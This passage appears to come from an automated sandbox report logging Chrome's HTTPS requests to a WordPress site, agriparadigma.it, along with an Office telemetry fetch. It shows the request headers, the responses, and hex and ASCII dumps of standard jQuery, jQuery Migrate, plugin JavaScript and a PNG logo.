                                                                                                                                          2024-11-28 10:33:03 UTC8000INData Raw: 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 74 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 74 29 26 26 65 2e 74 79 70 65 3d 3d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 65 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21 31 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 3f 22 6c 61 62 65 6c 22 69 6e 20 65 3f 22 6c 61 62 65 6c 22 69 6e 20 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 69 73 44 69 73 61 62 6c 65
                                                                                                                                          Data Ascii: ction(e){var t=e.nodeName.toLowerCase();return("input"===t||"button"===t)&&e.type===n}}function ge(t){return function(e){return"form"in e?e.parentNode&&!1===e.disabled?"label"in e?"label"in e.parentNode?e.parentNode.disabled===t:e.disabled===t:e.isDisable
                                                                                                                                          2024-11-28 10:33:03 UTC8000INData Raw: 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 3d 76 21 3d 3d 6d 3f 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 3a 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 2c 63 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 78 26 26 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 3d 21 6e 26 26 21 78 2c 64 3d 21 31 3b 69 66 28 63 29 7b 69 66 28 76 29 7b 77 68 69 6c 65 28 6c 29 7b 61 3d 65 3b 77 68 69 6c 65 28 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 21 31 3b 75 3d 6c 3d 22 6f 6e 6c 79 22 3d 3d 3d 68 26 26 21 75 26 26 22 6e 65 78 74 53
                                                                                                                                          Data Ascii: }:function(e,t,n){var r,i,o,a,s,u,l=v!==m?"nextSibling":"previousSibling",c=e.parentNode,f=x&&e.nodeName.toLowerCase(),p=!n&&!x,d=!1;if(c){if(v){while(l){a=e;while(a=a[l])if(x?a.nodeName.toLowerCase()===f:1===a.nodeType)return!1;u=l="only"===h&&!u&&"nextS
                                                                                                                                          2024-11-28 10:33:03 UTC8000INData Raw: 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 74 29 29 26 26 72 2e 73 70 65 63 69 66 69 65 64 3f 72 2e 76 61 6c 75 65 3a 6e 75 6c 6c 7d 29 2c 73 65 7d 28 43 29 3b 53 2e 66 69 6e 64 3d 64 2c 53 2e 65 78 70 72 3d 64 2e 73 65 6c 65 63 74 6f 72 73 2c 53 2e 65 78 70 72 5b 22 3a 22 5d 3d 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2c 53 2e 75 6e 69 71 75 65 53 6f 72 74 3d 53 2e 75 6e 69 71 75 65 3d 64 2e 75 6e 69 71 75 65 53 6f 72 74 2c 53 2e 74 65 78 74 3d 64 2e 67 65 74 54 65 78 74 2c 53 2e 69 73 58 4d 4c 44 6f 63 3d 64 2e 69 73 58 4d 4c 2c 53 2e 63 6f 6e 74 61 69 6e 73 3d 64 2e 63 6f 6e 74 61 69 6e 73 2c 53 2e 65 73 63 61 70 65 53 65 6c 65 63 74 6f 72 3d 64 2e 65 73 63 61 70 65 3b 76 61 72 20 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20
                                                                                                                                          Data Ascii: etAttributeNode(t))&&r.specified?r.value:null}),se}(C);S.find=d,S.expr=d.selectors,S.expr[":"]=S.expr.pseudos,S.uniqueSort=S.unique=d.uniqueSort,S.text=d.getText,S.isXMLDoc=d.isXML,S.contains=d.contains,S.escapeSelector=d.escape;var h=function(e,t,n){var
                                                                                                                                          2024-11-28 10:33:03 UTC8000INData Raw: 29 2c 43 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 24 29 2c 53 2e 72 65 61 64 79 28 29 7d 53 2e 66 6e 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 46 2e 74 68 65 6e 28 65 29 5b 22 63 61 74 63 68 22 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 53 2e 72 65 61 64 79 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 29 2c 74 68 69 73 7d 2c 53 2e 65 78 74 65 6e 64 28 7b 69 73 52 65 61 64 79 3a 21 31 2c 72 65 61 64 79 57 61 69 74 3a 31 2c 72 65 61 64 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 28 21 30 3d 3d 3d 65 3f 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 3a 53 2e 69 73 52 65 61 64 79 29 7c 7c 28 53 2e 69 73 52 65 61 64 79 3d 21 30 29 21 3d 3d 65 26 26 30 3c 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 7c 7c
                                                                                                                                          Data Ascii: ),C.removeEventListener("load",$),S.ready()}S.fn.ready=function(e){return F.then(e)["catch"](function(e){S.readyException(e)}),this},S.extend({isReady:!1,readyWait:1,ready:function(e){(!0===e?--S.readyWait:S.isReady)||(S.isReady=!0)!==e&&0<--S.readyWait||
                                                                                                                                          2024-11-28 10:33:03 UTC8000INData Raw: 20 6e 26 26 28 72 3d 72 7c 7c 6e 2c 6e 3d 76 6f 69 64 20 30 29 2c 74 29 45 65 28 65 2c 73 2c 6e 2c 72 2c 74 5b 73 5d 2c 6f 29 3b 72 65 74 75 72 6e 20 65 7d 69 66 28 6e 75 6c 6c 3d 3d 72 26 26 6e 75 6c 6c 3d 3d 69 3f 28 69 3d 6e 2c 72 3d 6e 3d 76 6f 69 64 20 30 29 3a 6e 75 6c 6c 3d 3d 69 26 26 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 28 69 3d 72 2c 72 3d 76 6f 69 64 20 30 29 3a 28 69 3d 72 2c 72 3d 6e 2c 6e 3d 76 6f 69 64 20 30 29 29 2c 21 31 3d 3d 3d 69 29 69 3d 54 65 3b 65 6c 73 65 20 69 66 28 21 69 29 72 65 74 75 72 6e 20 65 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 6f 26 26 28 61 3d 69 2c 28 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 28 29 2e 6f 66 66 28 65 29 2c 61 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d
                                                                                                                                          Data Ascii: n&&(r=r||n,n=void 0),t)Ee(e,s,n,r,t[s],o);return e}if(null==r&&null==i?(i=n,r=n=void 0):null==i&&("string"==typeof n?(i=r,r=void 0):(i=r,r=n,n=void 0)),!1===i)i=Te;else if(!i)return e;return 1===o&&(a=i,(i=function(e){return S().off(e),a.apply(this,argum
                                                                                                                                          2024-11-28 10:33:03 UTC8000INData Raw: 41 65 2e 74 65 73 74 28 64 29 29 72 65 74 75 72 6e 20 6e 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6e 2e 65 71 28 65 29 3b 68 26 26 28 72 5b 30 5d 3d 64 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 74 2e 68 74 6d 6c 28 29 29 29 2c 48 65 28 74 2c 72 2c 69 2c 6f 29 7d 29 3b 69 66 28 66 26 26 28 74 3d 28 65 3d 78 65 28 72 2c 6e 5b 30 5d 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 21 31 2c 6e 2c 6f 29 29 2e 66 69 72 73 74 43 68 69 6c 64 2c 31 3d 3d 3d 65 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 74 29 2c 74 7c 7c 6f 29 29 7b 66 6f 72 28 73 3d 28 61 3d 53 2e 6d 61 70 28 79 65 28 65 2c 22 73 63 72 69 70 74 22 29 2c 44 65 29 29 2e 6c 65 6e 67 74 68 3b 63 3c 66 3b 63 2b 2b 29 75 3d 65 2c 63 21 3d 3d 70 26 26 28
                                                                                                                                          Data Ascii: Ae.test(d))return n.each(function(e){var t=n.eq(e);h&&(r[0]=d.call(this,e,t.html())),He(t,r,i,o)});if(f&&(t=(e=xe(r,n[0].ownerDocument,!1,n,o)).firstChild,1===e.childNodes.length&&(e=t),t||o)){for(s=(a=S.map(ye(e,"script"),De)).length;c<f;c++)u=e,c!==p&&(
                                                                                                                                          2024-11-28 10:33:03 UTC8000INData Raw: 3d 3d 3d 28 6f 3d 74 79 70 65 6f 66 20 6e 29 26 26 28 69 3d 74 65 2e 65 78 65 63 28 6e 29 29 26 26 69 5b 31 5d 26 26 28 6e 3d 73 65 28 65 2c 74 2c 69 29 2c 6f 3d 22 6e 75 6d 62 65 72 22 29 2c 6e 75 6c 6c 21 3d 6e 26 26 6e 3d 3d 6e 26 26 28 22 6e 75 6d 62 65 72 22 21 3d 3d 6f 7c 7c 75 7c 7c 28 6e 2b 3d 69 26 26 69 5b 33 5d 7c 7c 28 53 2e 63 73 73 4e 75 6d 62 65 72 5b 73 5d 3f 22 22 3a 22 70 78 22 29 29 2c 76 2e 63 6c 65 61 72 43 6c 6f 6e 65 53 74 79 6c 65 7c 7c 22 22 21 3d 3d 6e 7c 7c 30 21 3d 3d 74 2e 69 6e 64 65 78 4f 66 28 22 62 61 63 6b 67 72 6f 75 6e 64 22 29 7c 7c 28 6c 5b 74 5d 3d 22 69 6e 68 65 72 69 74 22 29 2c 61 26 26 22 73 65 74 22 69 6e 20 61 26 26 76 6f 69 64 20 30 3d 3d 3d 28 6e 3d 61 2e 73 65 74 28 65 2c 6e 2c 72 29 29 7c 7c 28 75 3f 6c 2e
                                                                                                                                          Data Ascii: ===(o=typeof n)&&(i=te.exec(n))&&i[1]&&(n=se(e,t,i),o="number"),null!=n&&n==n&&("number"!==o||u||(n+=i&&i[3]||(S.cssNumber[s]?"":"px")),v.clearCloneStyle||""!==n||0!==t.indexOf("background")||(l[t]="inherit"),a&&"set"in a&&void 0===(n=a.set(e,n,r))||(u?l.
                                                                                                                                          2024-11-28 10:33:03 UTC8000INData Raw: 2e 71 75 65 75 65 21 3d 3d 69 7c 7c 28 6e 5b 74 5d 2e 61 6e 69 6d 2e 73 74 6f 70 28 6f 29 2c 65 3d 21 31 2c 6e 2e 73 70 6c 69 63 65 28 74 2c 31 29 29 3b 21 65 26 26 6f 7c 7c 53 2e 64 65 71 75 65 75 65 28 74 68 69 73 2c 69 29 7d 29 7d 2c 66 69 6e 69 73 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 31 21 3d 3d 61 26 26 28 61 3d 61 7c 7c 22 66 78 22 29 2c 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3d 59 2e 67 65 74 28 74 68 69 73 29 2c 6e 3d 74 5b 61 2b 22 71 75 65 75 65 22 5d 2c 72 3d 74 5b 61 2b 22 71 75 65 75 65 48 6f 6f 6b 73 22 5d 2c 69 3d 53 2e 74 69 6d 65 72 73 2c 6f 3d 6e 3f 6e 2e 6c 65 6e 67 74 68 3a 30 3b 66 6f 72 28 74 2e 66 69 6e 69 73 68 3d 21 30 2c 53 2e 71 75 65 75 65 28 74 68 69 73 2c
                                                                                                                                          Data Ascii: .queue!==i||(n[t].anim.stop(o),e=!1,n.splice(t,1));!e&&o||S.dequeue(this,i)})},finish:function(a){return!1!==a&&(a=a||"fx"),this.each(function(){var e,t=Y.get(this),n=t[a+"queue"],r=t[a+"queueHooks"],i=S.timers,o=n?n.length:0;for(t.finish=!0,S.queue(this,
                                                                                                                                          2024-11-28 10:33:03 UTC8000INData Raw: 65 76 65 6e 74 65 64 28 29 7c 7c 63 2e 5f 64 65 66 61 75 6c 74 26 26 21 31 21 3d 3d 63 2e 5f 64 65 66 61 75 6c 74 2e 61 70 70 6c 79 28 70 2e 70 6f 70 28 29 2c 74 29 7c 7c 21 56 28 6e 29 7c 7c 75 26 26 6d 28 6e 5b 64 5d 29 26 26 21 78 28 6e 29 26 26 28 28 61 3d 6e 5b 75 5d 29 26 26 28 6e 5b 75 5d 3d 6e 75 6c 6c 29 2c 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 65 64 3d 64 2c 65 2e 69 73 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 26 26 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 64 2c 77 74 29 2c 6e 5b 64 5d 28 29 2c 65 2e 69 73 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 26 26 66 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 64 2c 77 74 29 2c 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 65 64
                                                                                                                                          Data Ascii: evented()||c._default&&!1!==c._default.apply(p.pop(),t)||!V(n)||u&&m(n[d])&&!x(n)&&((a=n[u])&&(n[u]=null),S.event.triggered=d,e.isPropagationStopped()&&f.addEventListener(d,wt),n[d](),e.isPropagationStopped()&&f.removeEventListener(d,wt),S.event.triggered


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          75192.168.2.4498385.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:02 UTC578OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:03 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:03 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 14 Dec 2020 09:46:17 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 11224
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:03 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:03 UTC7876INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 33 2e 32 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                                                                                                          Data Ascii: /*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r
                                                                                                                                          2024-11-28 10:33:03 UTC3348INData Raw: 26 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 6e 2e 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 26 26 75 28 22 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 6c 6f 61 64 27 2e 2e 2e 29 20 63 61 6c 6c 65 64 20 61 66 74 65 72 20 6c 6f 61 64 20 65 76 65 6e 74 20 6f 63 63 75 72 72 65 64 22 29 2c 48 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 73 2e 65 61 63 68 28 5b 22 6c 6f 61 64 22 2c 22 75 6e 6c 6f 61 64 22 2c 22 65 72 72 6f 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 73 2e 66 6e 5b 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 30 29 3b 72 65 74 75 72 6e 22 6c 6f 61 64 22 3d 3d
                                                                                                                                          Data Ascii: &"complete"===n.document.readyState&&u("jQuery(window).on('load'...) called after load event occurred"),H.apply(this,arguments)},s.each(["load","unload","error"],function(e,t){s.fn[t]=function(){var e=Array.prototype.slice.call(arguments,0);return"load"==


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          76192.168.2.4498425.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:03 UTC399OUTGET /wp-content/uploads/sites/71/2017/02/AGRI_logo_white.png HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:03 UTC279INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:03 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 29 May 2018 16:08:40 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 7011
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:03 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: image/png
                                                                                                                                          2024-11-28 10:33:03 UTC7011INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 6f 08 04 00 00 00 fc cf 35 88 00 00 1b 2a 49 44 41 54 78 da ed 9d 77 60 15 c5 d6 c0 cf 4d a1 97 d0 91 de a4 49 47 41 aa 01 14 11 51 43 07 a9 2a 45 aa 01 69 2a 25 06 42 2f a1 87 6a 28 52 45 a2 4f 9a 20 86 26 3e 0b 22 88 a2 a2 f2 2c 4f 9f dd f7 f4 e3 f9 2c bf ef 8f 9d dd 9d bd 25 dc 84 80 82 33 e7 9f 7b 77 67 b6 cc fc 76 f6 cc 99 33 67 05 31 62 24 fb c5 54 81 11 03 96 11 03 96 11 03 96 11 23 06 2c 23 06 2c 23 06 2c 23 46 0c 58 46 0c 58 46 0c 58 46 8c 18 b0 8c 18 b0 8c 18 b0 8c 18 31 60 19 31 60 19 31 60 19 31 62 c0 32 62 c0 32 62 c0 32 62 c4 80 65 c4 80 65 c4 80 65 c4 48 36 80 95 f5 44 23 96 32 83 71 3c 4e 32 d3 a9 1a 22 57 05 7a d1 9e 38 7a 93 43 b2 21 d1 83 e5 44 d1 92 7c ea 7f 1a 7a aa
                                                                                                                                          Data Ascii: PNGIHDR,o5*IDATxw`MIGAQC*Ei*%B/j(REO &>",O,%3{wgv3g1b$T#,#,#,#FXFXFXF1`1`1`1b2b2b2beeeH6D#2q<N2"Wz8zC!D|z


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          77192.168.2.4498415.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:03 UTC588OUTGET /wp-content/plugins/wpcf7-redirect/build/js/wpcf7r-fe.js?ver=1.1 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:03 UTC315INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:03 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 11 Nov 2024 19:05:33 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 8074
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:03 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:03 UTC7877INData Raw: 76 61 72 20 77 70 63 66 37 5f 72 65 64 69 72 65 63 74 3b 0a 0a 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 57 70 63 66 37 5f 72 65 64 69 72 65 63 74 28 29 20 7b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 69 6e 69 74 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 77 70 63 66 37 5f 72 65 64 69 72 65 63 74 5f 6d 61 69 6c 73 65 6e 74 5f 68 61 6e 64 6c 65 72 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 77 70 63 66 37 5f 72 65 64 69 72 65 63 74 5f 6d 61 69 6c 73 65 6e 74 5f 68 61 6e 64 6c 65 72 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76
                                                                                                                                          Data Ascii: var wpcf7_redirect;(function ($) { function Wpcf7_redirect() { this.init = function () { this.wpcf7_redirect_mailsent_handler(); }; this.wpcf7_redirect_mailsent_handler = function () { document.addEv
                                                                                                                                          2024-11-28 10:33:03 UTC197INData Raw: 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 73 74 72 69 6e 67 2e 72 65 70 6c 61 63 65 28 2f 5c 26 5b 5c 77 5c 64 5c 23 5d 7b 32 2c 35 7d 5c 3b 2f 67 2c 20 66 75 6e 63 74 69 6f 6e 20 28 6d 29 20 7b 20 72 65 74 75 72 6e 20 6d 61 70 5b 6d 5d 3b 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 69 6e 69 74 28 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 77 70 63 66 37 5f 72 65 64 69 72 65 63 74 20 3d 20 6e 65 77 20 57 70 63 66 37 5f 72 65 64 69 72 65 63 74 28 29 3b 0a 7d 29 28 6a 51 75 65 72 79 29 3b
                                                                                                                                          Data Ascii: }; return string.replace(/\&[\w\d\#]{2,5}\;/g, function (m) { return map[m]; }); }; this.init(); } wpcf7_redirect = new Wpcf7_redirect();})(jQuery);


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          78192.168.2.4498375.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:03 UTC412OUTGET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.7 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          79192.168.2.44983213.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:04 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:04 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 471
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                          ETag: "0x8DC582BB10C598B"
                                                                                                                                          x-ms-request-id: 30944020-a01e-0053-5e8b-3f8603000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103304Z-174f7845968glpgnhC1EWR7uec0000000yf0000000004xya
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
